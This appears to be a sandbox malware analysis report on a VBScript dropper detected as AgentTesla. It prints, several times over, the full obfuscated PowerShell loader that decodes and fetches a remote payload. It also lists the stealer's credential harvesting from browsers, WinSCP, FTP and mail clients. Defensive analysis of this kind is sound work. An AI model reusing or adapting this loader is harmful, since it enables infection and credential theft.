            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$semiannually163 = 1;$varityped='substrin';$varityped+='g';function spatiumet($merotomy){$ganglioma=$merotomy.length-$semiannually163;for($undereying136=5; $undereying136 -lt $ganglioma; $undereying136+=(6)){$stacc+=$merotomy.$varityped.invoke($undereying136, $semiannually163);}$stacc;}function salsdren($fortynd){. ($fusionsaftaler) ($fortynd);}$morallovene=spatiumet 'findem slabobed,mzguiltisu.nolunforlvarmeaskru /afslr5 p yn.u aft0 kost al,og(ddsaaw,pitaiboo lnbrssednusseosem cwfremssdi eg chattnpretht,oren supra1abe.s0guldv.colou0haema;adria br,dswr creiformanrefrn6uncou4velar; legi noncix non 6 nikl4synli; skri pseurgasm,vp,gts:bj.rg1 mo,i2organ1armad.flask0abs,i)galo. r tscgskyldeaktioc dionknoncoosyske/,atin2luged0janse1bul.p0fj.rn0e cin1pante0coope1surro ,aineffly eiuvi lr,readerve,efdiphyoaphroxharri/bygn.1eluls2ebelt1tra i.perca0 dupe ';$anathematise=spatiumet 'lill,ufalhos spleep lorrfiske-ohsknan.ighg pawne masknlechrtonion ';$aivr=spatiumet 'figurhpreintger.rtvognppt.llas.onse:lay u/bi,le/ b.lldfinerrf.agti bj,gvindpae.atte. .ilpgcanchoeuropo educgwr telafslaered.m.bak uck upvopengem vlve/afstvupervecfrit ? k,noelivewxminerp belootiltrrwind tu lia=ballodsankeoop ftwkrverndekodlkapreo oxydahum.ld appl& scarigeomedamnio= hudd1 dommol.omes erroqgal,iaudbetzkartolchanikratapr tink_ clar7 kna.hf.uevzspadsprovdy0deminlatomasph.lif pagibprogr9 aergdtappejudb t3fanmagfagblxdagplcn,nineoutf.ouna.etcentr-sikke9figensbrain5tyven ';$succesombrust=spatiumet 'trykl>polyh ';$fusionsaftaler=spatiumet 'af enitankeewattsxal um ';$pantebrevshandelen = spatiumet ' ntee jerncwkdreha johol,xia d.ske%svindara,tapdevonpbuti,dci,araoveretpennaadef,n%pragt\flec.efu,dvlsubapeprovicsortetindicr theooeb.lln trouesup lg panda .ogltreinsidriftv hypee beci. at es u.dihung oaper,i patte&union& s.bl hamm eosterc konghun.pao urba lsnin$pum.c ';salsdren (spatiumet 'suppl$enh.lgbolivlsemino uni,bboligasvulmlindsp: plo,ftransl tje,uringlkgroovtra eru jungecatenr hovnigreennundefgoutre=himme(tiltac epokmxsford ra.i prova/datasc deut dext.$ mesipjagteaboligngelogt skilebehanbeupherenra.el gtevcrustsisba.h dewaahalopnchrisdskakte railludadredec,lnpaatv)antil ');salsdren (spatiumet ' mist$ ma,sgtilprl banko dashb.annyakardslquant:geledacemennmaalet bet.h,iltvr .ndkoabamppa taco pa lppass hpa ahatr,llgubereiagerbsgrns tforsii .airc e,ip=garvn$fratraseraliarapavfenacrottea.journsmorbrpintarlmandaicou ttsuper(skri $st nosamp,iu nytaccontrcrygraepunktsrecomo navnmkhedabexsicrdameturustbsunddrtbesgs)t les ');$aivr=$anthropophagistic[0];salsdren (spatiumet 'ov rm$ciphegopskrlpromeof rskbscollaantiplf.ske:b skufdrvleoafbrer ulkss .ragefl esnausredligniedishblinsisstel.fe undesdagceosnapsmtilvekydelsoshattsb odstautoenmicreigalannmindeg sladedopinrfyrin= itrinfa,ceecellewphono- sknlohoussbplotnj deple hydrcun.stt refr konkusbucrny.ecoms affttno glesens msa kt.beli
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$semiannually163 = 1;$varityped='substrin';$varityped+='g';function spatiumet($merotomy){$ganglioma=$merotomy.length-$semiannually163;for($undereying136=5; $undereying136 -lt $ganglioma; $undereying136+=(6)){$stacc+=$merotomy.$varityped.invoke($undereying136, $semiannually163);}$stacc;}function salsdren($fortynd){. ($fusionsaftaler) ($fortynd);}$morallovene=spatiumet 'findem slabobed,mzguiltisu.nolunforlvarmeaskru /afslr5 p yn.u aft0 kost al,og(ddsaaw,pitaiboo lnbrssednusseosem cwfremssdi eg chattnpretht,oren supra1abe.s0guldv.colou0haema;adria br,dswr creiformanrefrn6uncou4velar; legi noncix non 6 nikl4synli; skri pseurgasm,vp,gts:bj.rg1 mo,i2organ1armad.flask0abs,i)galo. r tscgskyldeaktioc dionknoncoosyske/,atin2luged0janse1bul.p0fj.rn0e cin1pante0coope1surro ,aineffly eiuvi lr,readerve,efdiphyoaphroxharri/bygn.1eluls2ebelt1tra i.perca0 dupe ';$anathematise=spatiumet 'lill,ufalhos spleep lorrfiske-ohsknan.ighg pawne masknlechrtonion ';$aivr=spatiumet 'figurhpreintger.rtvognppt.llas.onse:lay u/bi,le/ b.lldfinerrf.agti bj,gvindpae.atte. .ilpgcanchoeuropo educgwr telafslaered.m.bak uck upvopengem vlve/afstvupervecfrit ? k,noelivewxminerp belootiltrrwind tu lia=ballodsankeoop ftwkrverndekodlkapreo oxydahum.ld appl& scarigeomedamnio= hudd1 dommol.omes erroqgal,iaudbetzkartolchanikratapr tink_ clar7 kna.hf.uevzspadsprovdy0deminlatomasph.lif pagibprogr9 aergdtappejudb t3fanmagfagblxdagplcn,nineoutf.ouna.etcentr-sikke9figensbrain5tyven ';$succesombrust=spatiumet 'trykl>polyh ';$fusionsaftaler=spatiumet 'af enitankeewattsxal um ';$pantebrevshandelen = spatiumet ' ntee jerncwkdreha johol,xia d.ske%svindara,tapdevonpbuti,dci,araoveretpennaadef,n%pragt\flec.efu,dvlsubapeprovicsortetindicr theooeb.lln trouesup lg panda .ogltreinsidriftv hypee beci. at es u.dihung oaper,i patte&union& s.bl hamm eosterc konghun.pao urba lsnin$pum.c ';salsdren (spatiumet 'suppl$enh.lgbolivlsemino uni,bboligasvulmlindsp: plo,ftransl tje,uringlkgroovtra eru jungecatenr hovnigreennundefgoutre=himme(tiltac epokmxsford ra.i prova/datasc deut dext.$ mesipjagteaboligngelogt skilebehanbeupherenra.el gtevcrustsisba.h dewaahalopnchrisdskakte railludadredec,lnpaatv)antil ');salsdren (spatiumet ' mist$ ma,sgtilprl banko dashb.annyakardslquant:geledacemennmaalet bet.h,iltvr .ndkoabamppa taco pa lppass hpa ahatr,llgubereiagerbsgrns tforsii .airc e,ip=garvn$fratraseraliarapavfenacrottea.journsmorbrpintarlmandaicou ttsuper(skri $st nosamp,iu nytaccontrcrygraepunktsrecomo navnmkhedabexsicrdameturustbsunddrtbesgs)t les ');$aivr=$anthropophagistic[0];salsdren (spatiumet 'ov rm$ciphegopskrlpromeof rskbscollaantiplf.ske:b skufdrvleoafbrer ulkss .ragefl esnausredligniedishblinsisstel.fe undesdagceosnapsmtilvekydelsoshattsb odstautoenmicreigalannmindeg sladedopinrfyrin= itrinfa,ceecellewphono- sknlohoussbplotnj deple hydrcun.stt refr konkusbucrny.ecoms affttno glesens msa kt.beli
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$semiannually163 = 1;$varityped='substrin';$varityped+='g';function spatiumet($merotomy){$ganglioma=$merotomy.length-$semiannually163;for($undereying136=5; $undereying136 -lt $ganglioma; $undereying136+=(6)){$stacc+=$merotomy.$varityped.invoke($undereying136, $semiannually163);}$stacc;}function salsdren($fortynd){. ($fusionsaftaler) ($fortynd);}$morallovene=spatiumet 'findem slabobed,mzguiltisu.nolunforlvarmeaskru /afslr5 p yn.u aft0 kost al,og(ddsaaw,pitaiboo lnbrssednusseosem cwfremssdi eg chattnpretht,oren supra1abe.s0guldv.colou0haema;adria br,dswr creiformanrefrn6uncou4velar; legi noncix non 6 nikl4synli; skri pseurgasm,vp,gts:bj.rg1 mo,i2organ1armad.flask0abs,i)galo. r tscgskyldeaktioc dionknoncoosyske/,atin2luged0janse1bul.p0fj.rn0e cin1pante0coope1surro ,aineffly eiuvi lr,readerve,efdiphyoaphroxharri/bygn.1eluls2ebelt1tra i.perca0 dupe ';$anathematise=spatiumet 'lill,ufalhos spleep lorrfiske-ohsknan.ighg pawne masknlechrtonion ';$aivr=spatiumet 'figurhpreintger.rtvognppt.llas.onse:lay u/bi,le/ b.lldfinerrf.agti bj,gvindpae.atte. .ilpgcanchoeuropo educgwr telafslaered.m.bak uck upvopengem vlve/afstvupervecfrit ? k,noelivewxminerp belootiltrrwind tu lia=ballodsankeoop ftwkrverndekodlkapreo oxydahum.ld appl& scarigeomedamnio= hudd1 dommol.omes erroqgal,iaudbetzkartolchanikratapr tink_ clar7 kna.hf.uevzspadsprovdy0deminlatomasph.lif pagibprogr9 aergdtappejudb t3fanmagfagblxdagplcn,nineoutf.ouna.etcentr-sikke9figensbrain5tyven ';$succesombrust=spatiumet 'trykl>polyh ';$fusionsaftaler=spatiumet 'af enitankeewattsxal um ';$pantebrevshandelen = spatiumet ' ntee jerncwkdreha johol,xia d.ske%svindara,tapdevonpbuti,dci,araoveretpennaadef,n%pragt\flec.efu,dvlsubapeprovicsortetindicr theooeb.lln trouesup lg panda .ogltreinsidriftv hypee beci. at es u.dihung oaper,i patte&union& s.bl hamm eosterc konghun.pao urba lsnin$pum.c ';salsdren (spatiumet 'suppl$enh.lgbolivlsemino uni,bboligasvulmlindsp: plo,ftransl tje,uringlkgroovtra eru jungecatenr hovnigreennundefgoutre=himme(tiltac epokmxsford ra.i prova/datasc deut dext.$ mesipjagteaboligngelogt skilebehanbeupherenra.el gtevcrustsisba.h dewaahalopnchrisdskakte railludadredec,lnpaatv)antil ');salsdren (spatiumet ' mist$ ma,sgtilprl banko dashb.annyakardslquant:geledacemennmaalet bet.h,iltvr .ndkoabamppa taco pa lppass hpa ahatr,llgubereiagerbsgrns tforsii .airc e,ip=garvn$fratraseraliarapavfenacrottea.journsmorbrpintarlmandaicou ttsuper(skri $st nosamp,iu nytaccontrcrygraepunktsrecomo navnmkhedabexsicrdameturustbsunddrtbesgs)t les ');$aivr=$anthropophagistic[0];salsdren (spatiumet 'ov rm$ciphegopskrlpromeof rskbscollaantiplf.ske:b skufdrvleoafbrer ulkss .ragefl esnausredligniedishblinsisstel.fe undesdagceosnapsmtilvekydelsoshattsb odstautoenmicreigalannmindeg sladedopinrfyrin= itrinfa,ceecellewphono- sknlohoussbplotnj deple hydrcun.stt refr konkusbucrny.ecoms affttno glesens msa kt.beliJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$semiannually163 = 1;$varityped='substrin';$varityped+='g';function spatiumet($merotomy){$ganglioma=$merotomy.length-$semiannually163;for($undereying136=5; $undereying136 -lt $ganglioma; $undereying136+=(6)){$stacc+=$merotomy.$varityped.invoke($undereying136, $semiannually163);}$stacc;}function salsdren($fortynd){. ($fusionsaftaler) ($fortynd);}$morallovene=spatiumet 'findem slabobed,mzguiltisu.nolunforlvarmeaskru /afslr5 p yn.u aft0 kost al,og(ddsaaw,pitaiboo lnbrssednusseosem cwfremssdi eg chattnpretht,oren supra1abe.s0guldv.colou0haema;adria br,dswr creiformanrefrn6uncou4velar; legi noncix non 6 nikl4synli; skri pseurgasm,vp,gts:bj.rg1 mo,i2organ1armad.flask0abs,i)galo. r tscgskyldeaktioc dionknoncoosyske/,atin2luged0janse1bul.p0fj.rn0e cin1pante0coope1surro ,aineffly eiuvi lr,readerve,efdiphyoaphroxharri/bygn.1eluls2ebelt1tra i.perca0 dupe ';$anathematise=spatiumet 'lill,ufalhos spleep lorrfiske-ohsknan.ighg pawne masknlechrtonion ';$aivr=spatiumet 'figurhpreintger.rtvognppt.llas.onse:lay u/bi,le/ b.lldfinerrf.agti bj,gvindpae.atte. .ilpgcanchoeuropo educgwr telafslaered.m.bak uck upvopengem vlve/afstvupervecfrit ? k,noelivewxminerp belootiltrrwind tu lia=ballodsankeoop ftwkrverndekodlkapreo oxydahum.ld appl& scarigeomedamnio= hudd1 dommol.omes erroqgal,iaudbetzkartolchanikratapr tink_ clar7 kna.hf.uevzspadsprovdy0deminlatomasph.lif pagibprogr9 aergdtappejudb t3fanmagfagblxdagplcn,nineoutf.ouna.etcentr-sikke9figensbrain5tyven ';$succesombrust=spatiumet 'trykl>polyh ';$fusionsaftaler=spatiumet 'af enitankeewattsxal um ';$pantebrevshandelen = spatiumet ' ntee jerncwkdreha johol,xia d.ske%svindara,tapdevonpbuti,dci,araoveretpennaadef,n%pragt\flec.efu,dvlsubapeprovicsortetindicr theooeb.lln trouesup lg panda .ogltreinsidriftv hypee beci. at es u.dihung oaper,i patte&union& s.bl hamm eosterc konghun.pao urba lsnin$pum.c ';salsdren (spatiumet 'suppl$enh.lgbolivlsemino uni,bboligasvulmlindsp: plo,ftransl tje,uringlkgroovtra eru jungecatenr hovnigreennundefgoutre=himme(tiltac epokmxsford ra.i prova/datasc deut dext.$ mesipjagteaboligngelogt skilebehanbeupherenra.el gtevcrustsisba.h dewaahalopnchrisdskakte railludadredec,lnpaatv)antil ');salsdren (spatiumet ' mist$ ma,sgtilprl banko dashb.annyakardslquant:geledacemennmaalet bet.h,iltvr .ndkoabamppa taco pa lppass hpa ahatr,llgubereiagerbsgrns tforsii .airc e,ip=garvn$fratraseraliarapavfenacrottea.journsmorbrpintarlmandaicou ttsuper(skri $st nosamp,iu nytaccontrcrygraepunktsrecomo navnmkhedabexsicrdameturustbsunddrtbesgs)t les ');$aivr=$anthropophagistic[0];salsdren (spatiumet 'ov rm$ciphegopskrlpromeof rskbscollaantiplf.ske:b skufdrvleoafbrer ulkss .ragefl esnausredligniedishblinsisstel.fe undesdagceosnapsmtilvekydelsoshattsb odstautoenmicreigalannmindeg sladedopinrfyrin= itrinfa,ceecellewphono- sknlohoussbplotnj deple hydrcun.stt refr konkusbucrny.ecoms affttno glesens msa kt.beliJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000B.00000002.2782121824.0000000022FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2782121824.0000000022FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 0000000B.00000002.2782121824.0000000022FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000B.00000002.2782121824.0000000022FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2782121824.0000000022FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information321
            Scripting            		Valid Accounts221
            Windows Management Instrumentation            		321
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		111
            Process Injection            		2
            Obfuscated Files or Information            		11
            Input Capture            		24
            System Information Discovery            		Remote Desktop Protocol2
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts11
            Command and Scripting Interpreter            		Logon Script (Windows)Logon Script (Windows)1
            Software Packing            		1
            Credentials in Registry            		321
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Process Discovery            		Distributed Component Object Model11
            Input Capture            		13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets151
            Virtualization/Sandbox Evasion            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts151
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
            Process Injection            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428354 Sample: Shipping Dcuments_CI PKL_HL_.vbs Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 31 mail.myhydropowered.com 2->31 33 ip-api.com 2->33 35 4 other IPs or domains 2->35 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for URL or domain 2->53 55 7 other signatures 2->55 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 57 VBScript performs obfuscated calls to suspicious functions 9->57 59 Suspicious powershell command line found 9->59 61 Wscript starts Powershell (via cmd or directly) 9->61 63 3 other signatures 9->63 12 powershell.exe 14 19 9->12         started        16 WmiPrvSE.exe 9->16         started        process6 dnsIp7 41 drive.google.com 64.233.185.102, 443, 49705, 49714 GOOGLEUS United States 12->41 43 drive.usercontent.google.com 64.233.185.132, 443, 49707, 49716 GOOGLEUS United States 12->43 73 Suspicious powershell command line found 12->73 75 Very long command line found 12->75 77 Found suspicious powershell code related to unpacking or dynamic code loading 12->77 18 powershell.exe 17 12->18         started        21 conhost.exe 12->21         started        23 cmd.exe 1 12->23         started        signatures8 process9 signatures10 45 Writes to foreign memory regions 18->45 47 Found suspicious powershell code related to unpacking or dynamic code loading 18->47 25 wab.exe 15 8 18->25         started        29 cmd.exe 1 18->29         started        process11 dnsIp12 37 ip-api.com 208.95.112.1, 49718, 80 TUT-ASUS United States 25->37 39 api.ipify.org 172.67.74.152, 443, 49717 CLOUDFLARENETUS United States 25->39 65 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 25->65 67 Tries to steal Mail credentials (via file / registry access) 25->67 69 Tries to harvest and steal ftp login credentials 25->69 71 2 other signatures 25->71 signatures13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Shipping Dcuments_CI PKL_HL_.vbs8%ReversingLabsWin32.Dropper.Generic

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
